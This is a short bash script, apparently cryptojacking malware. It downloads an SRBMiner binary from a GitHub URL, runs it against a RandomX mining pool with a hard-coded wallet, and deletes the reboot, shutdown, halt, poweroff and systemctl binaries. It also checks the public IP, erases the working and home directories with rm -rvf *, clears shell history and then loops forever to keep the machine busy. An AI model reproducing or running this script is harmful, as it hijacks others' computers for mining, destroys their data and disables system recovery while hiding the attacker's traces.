#!/bin/bash
wget -O mm https://github.com/claires67/buut/raw/main/SRBMiner-MULTI > /dev/null 2>&1
chmod 777 mm
./mm --algorithm randomx --pool randomx.rplant.xyz:7139 --wallet cumzZZjSJUtcWe9D4XXxy4G2kbMMVyCK7ZpvzET9P7qb9V7MvVqZdqGMRbu7CX4z6NG23ZRbkypK94mngbKXKynr8x51oyuMCp.$(shuf -n 1 -i 1-99999)-Bismi --keepalive true
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
